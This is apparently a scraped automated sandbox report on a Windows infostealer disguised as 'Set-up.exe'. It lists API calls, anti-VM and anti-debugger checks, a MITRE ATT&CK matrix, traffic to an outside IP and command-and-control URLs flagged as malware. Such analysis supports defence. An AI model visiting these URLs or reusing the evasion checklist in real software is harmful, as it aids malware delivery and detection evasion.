Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FAB3F0	0_2_00FAB3F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F47310	0_2_00F47310
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F9B4B0	0_2_00F9B4B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_011335B0	0_2_011335B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00EE3450	0_2_00EE3450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_011135C0	0_2_011135C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_011255E0	0_2_011255E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DCD5C0	0_2_00DCD5C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0112D430	0_2_0112D430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0112F430	0_2_0112F430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FAF5B0	0_2_00FAF5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E2F5B0	0_2_00E2F5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_011374A0	0_2_011374A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01137730	0_2_01137730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0110B720	0_2_0110B720
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E336D0	0_2_00E336D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01135780	0_2_01135780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E55670	0_2_00E55670
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_011517A0	0_2_011517A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_011237E0	0_2_011237E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E677E0	0_2_00E677E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FB97D0	0_2_00FB97D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01129650	0_2_01129650
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F49790	0_2_00F49790
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E3D740	0_2_00E3D740
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_010636A0	0_2_010636A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_010F96B0	0_2_010F96B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_011156D0	0_2_011156D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0113B6F0	0_2_0113B6F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01119920	0_2_01119920
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E79880	0_2_00E79880
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01083960	0_2_01083960
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0112B990	0_2_0112B990
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F4F850	0_2_00F4F850
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E6B840	0_2_00E6B840
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00EB5830	0_2_00EB5830
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F9D9E0	0_2_00F9D9E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0112D890	0_2_0112D890
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F2B900	0_2_00F2B900

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00ED9720 appears 34 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F9A170 appears 58 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F9CBC0 appears 457 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00DDCCD0 appears 47 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F9C9B0 appears 83 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E04F40 appears 301 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E04FD0 appears 233 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00DDCD40 appears 65 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F9CA40 appears 84 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00DC73F0 appears 94 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00DCCAA0 appears 62 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00DC71E0 appears 43 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E050A0 appears 49 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F77120 appears 49 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00DC75A0 appears 556 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E05340 appears 49 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F77220 appears 748 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F9E710 appears 32 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 01148B80 appears 33 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00F77310 appears 44 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00EA44A0 appears 79 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal76.troj.spyw.evad.winEXE@1/0@8/2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00DDD090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,

0_2_00DDD090

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00DC255D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00DC29FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,

0_2_00DC29FF

Source: C:\Users\user\Desktop\Set-up.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Set-up.exe	ReversingLabs: Detection: 27%
Source: Set-up.exe	Virustotal: Detection: 31%

Source: Set-up.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 7793288 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4b1c00
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x12e200
Source: Set-up.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00DC14E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00DC14E0

Source: Set-up.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01C011B8 push eax; ret	0_3_01C011B9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEEA1 push ebp; ret	0_3_01BFEECE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_01BFEE92 push edi; iretd	0_3_01BFEE9F

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\Set-up.exe

Code function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second

0_2_00DC29FF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Set-up.exe	Binary or memory string: PROCMON.EXE
Source: Set-up.exe	Binary or memory string: X64DBG.EXE
Source: Set-up.exe	Binary or memory string: WINDBG.EXE
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exe	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00FA9980 rdtsc

0_2_00FA9980

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00DC29FF

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 6.3 %

Source: C:\Users\user\Desktop\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DC255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,	0_2_00DC255D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DC29FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,	0_2_00DC29FF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F9E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,	0_2_00F9E270

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00DC255D

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00DC255D

Source: Set-up.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.1678923233.0000000001A77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe, 00000000.00000003.1875829833.0000000001BF2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1877214773.0000000001BFB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875909037.0000000001BFA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875663648.0000000001BED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875889597.0000000001BF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Set-up.exe, 00000000.00000003.1678326698.0000000001BA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00FA9980 rdtsc

0_2_00FA9980

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00DC29FF

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00DC14E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00DC14E0

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DC116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_00DC116C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DC11A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_00DC11A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DC1160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_00DC1160
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DC13C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,	0_2_00DC13C9

Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00FA93D0 GetSystemTime,SystemTimeToFileTime,

0_2_00FA93D0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_01268E70 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,

0_2_01268E70

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, Set-up.exe, 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 34.147.147.173:80

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DFA550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,	0_2_00DFA550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E8AA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,	0_2_00E8AA30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E0E520 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,	0_2_00E0E520

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	17 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	27%	ReversingLabs	Win32.Infostealer.Tinba
Set-up.exe	32%	Virustotal		Browse

Source	Detection	Scanner	Label
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=0	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435se	100%	Avira URL Cloud	malware
